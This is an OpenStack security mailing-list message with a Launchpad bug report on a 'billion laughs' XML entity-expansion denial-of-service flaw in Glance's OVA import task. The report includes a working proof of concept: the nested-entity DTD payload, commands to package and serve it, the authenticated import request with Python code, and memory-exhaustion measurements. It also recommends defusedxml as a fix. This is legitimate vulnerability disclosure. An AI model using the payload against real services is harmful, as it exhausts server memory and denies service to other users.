[Openstack-security] [Bug 1625402] Re: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py

Charles Neill charles.neill at rackspace.com
Thu Sep 29 21:09:03 UTC 2016


@Brian: Thanks for the follow-up. I was just trying to figure out
whether "work_dir" is commonly enabled by operators or not (which is
kind of like asking you to look into an "operator crystal ball", I
realize). I know that it must be specified manually, and that it would
likely be enabled only if Tasks access were desired. I was just trying
to assess whether enabling Tasks is something that happens 10% of the
time or 90% of the time. At this point, barring any further comments, it
seems the answer is that this is rare.

@Ian: We're not trying to push some hidden agenda here. I think my
questions have been pretty clear, and focused on one thing: Is this
something most reasonable operators enable? I can't quantify this bug's
likelihood of impact if I don't at least have a fuzzy answer to that
question. My goal was simply to understand how much exposure there is
likely to be in the community, and to align the response we make with
the actual risk that is presented. Based on what I've seen, an OSSN
seems reasonable.

I bring up Keystone credentials (as used in many OpenStack services,
not Glance specifically) merely as an example of a configuration
variable that has no default value but would not make sense to leave
undefined in 90% of situations. Without opinions from people more
knowledgeable about Glance than myself, I can't make that determination.

My guess is that we are using incompatible definitions of the phrase "by
default." My take is, if it enables functionality that most sane
operators want/need, and is therefore defined in almost all cases, it is
a de-facto default whether or not there is a sane default provided in
the service's example configuration file. Your definition seems to be
"is this specified in the configuration file by default?", to which I
already know the answer (no). So far I have not received an explicit
answer to my question, but as stated above, I guess I have to assume
that this means operator usage is not common.

-- 
You received this bug notification because you are a member of OpenStack
Security, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1625402

Title:
  Authenticated "Billion laughs" memory exhaustion / DoS vulnerability
  in ovf_process.py

Status in Glance:
  Opinion
Status in OpenStack Security Advisory:
  Opinion

Bug description:
  Creating a task to import an OVA file with a malicious OVF file inside
  it will result in significant memory usage by the glance-api process.

  This is caused by the use of the xml.etree module in ovf_process.py
  [1] [2] to process OVF images extracted from OVA files with
  ET.iterparse(). No validation is currently performed on the XML prior
  to parsing.

  As outlined in the Python documentation, xml.etree is vulnerable to
  the "billion laughs" attack when parsing untrusted input [3].

  Note: if using a devstack instance, you will need to edit the
  "work_dir" variable in /etc/glance/glance-api.conf to point to a real
  folder.
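
  A minimal sketch of that setting, assuming the option lives in the
  [task] section of glance-api.conf and using a placeholder path:

      [task]
      work_dir = /tmp/glance-tasks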

  -----------------------------------------
  Example request
  -----------------------------------------

  POST /v2/tasks HTTP/1.1
  Host: localhost:1338
  Connection: close
  Accept-Encoding: gzip, deflate
  Accept: application/json
  User-Agent: python-requests/2.11.1
  Content-Type: application/json
  X-Auth-Token: [ADMIN TOKEN]
  Content-Length: 287

  {
      "type": "import",
      "input": {
          "import_from": "http://127.0.0.1:9090/laugh.ova",
          "import_from_format": "raw",
          "image_properties": {
              "disk_format": "raw",
              "container_format": "ova",
       "name": "laugh"
          }
      }
  }
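
  The same request can be reproduced with python-requests (the token
  and endpoints are placeholders matching the raw request above):

      import requests

      # Task payload identical to the JSON body shown above
      task = {
          "type": "import",
          "input": {
              "import_from": "http://127.0.0.1:9090/laugh.ova",
              "import_from_format": "raw",
              "image_properties": {
                  "disk_format": "raw",
                  "container_format": "ova",
                  "name": "laugh",
              },
          },
      }

      resp = requests.post(
          "http://localhost:1338/v2/tasks",
          json=task,
          headers={"X-Auth-Token": "[ADMIN TOKEN]"},
      )
      print(resp.status_code, resp.text)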

  -----------------------------------------
  Creating the malicious OVA/OVF
  -----------------------------------------

  "laugh.ova" can be created like so:

  1. Copy this into a file called "laugh.ovf" (see the note on
  expansion size after these steps):
  <?xml version="1.0"?>
  <!DOCTYPE lolz [
   <!ENTITY lol "lol">
   <!ELEMENT lolz (#PCDATA)>
   <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
   <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
   <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
   <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
   <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
   <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
   <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
   <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
   <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
   <!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
  ]>
  <lolz>&lol10;</lolz>

  2. Create the OVA file (tarball) with the "tar" utility:

      $ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova

  3. (Optional) If you want to serve this from your devstack instance
  (as in the request above), run this in the folder where you created
  the OVA file:

      $ python -m SimpleHTTPServer 9090
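
  For scale: each entity level in the DTD from step 1 multiplies the
  number of "lol" strings by 10, and the document body references
  &lol10;, so a parser that expands it must materialize 10**10 copies
  of the 3-byte string "lol", roughly 28 GiB of text from a roughly
  one-kilobyte file:

      # Expansion arithmetic for the laugh.ovf DTD in step 1
      copies = 10 ** 10                 # &lolN; expands to 10**N "lol"s
      expanded = copies * len("lol")    # ~3 * 10**10 bytes
      print("%.1f GiB of expanded text" % (expanded / 2.0 ** 30))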

  -----------------------------------------
  Performance impact
  -----------------------------------------
  Profiling my VM from a fresh boot, then after submitting this task
  twice (repeating calls to the same command):

  $ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg

  (Object in every row: devstack_devstack_1473967678756_60616;
  Guest/Pagefile/Usage/Total stayed at 0 kB throughout.)

  Query        Guest/CPU/Load/User:avg   Guest/RAM/Usage/Free
  fresh boot   13.00%                    2456680 kB
  1            84.00%                    1989684 kB
  2            88.00%                    1694080 kB
  3            83.00%                    1426876 kB
  4            79.00%                    1181248 kB
  5            85.00%                    817244 kB
  6            84.00%                    548636 kB
  7            74.00%                    118932 kB

  After submitting enough of these requests at once, glance-api runs out
  of memory and can't restart itself. Here's what the log looks like
  after the "killer request" [4].

  -----------------------------------------
  Mitigation
  -----------------------------------------

  Any instances of xml.etree should be replaced with their equivalents
  in a secure XML parsing library such as defusedxml [5].
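
  A hedged sketch of that approach (not the actual Glance patch; the
  file name is a placeholder):

      from defusedxml import EntitiesForbidden
      import defusedxml.ElementTree as ET

      # defusedxml mirrors the stdlib ElementTree API but refuses to
      # process entity declarations by default, raising an exception
      # instead of expanding them.
      try:
          tree = ET.parse('laugh.ovf')
      except EntitiesForbidden:
          print('Rejected malicious OVF: entity declarations forbidden')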

  1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24
  2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184
  3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities
  4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64
  5: https://pypi.python.org/pypi/defusedxml

  -----------------------------------------
  Other
  -----------------------------------------
  Thanks to Rahul Nair from the OpenStack Security Project for bringing
  the ovf_process file to my attention in the first place. We are
  testing Glance for security defects as part of OSIC, using our API
  security testing tool, Syntribos
  (https://github.com/openstack/syntribos), as well as Bandit (which
  was used to discover this issue).

To manage notifications about this bug go to:
https://bugs.launchpad.net/glance/+bug/1625402/+subscriptions

More information about the Openstack-security mailing list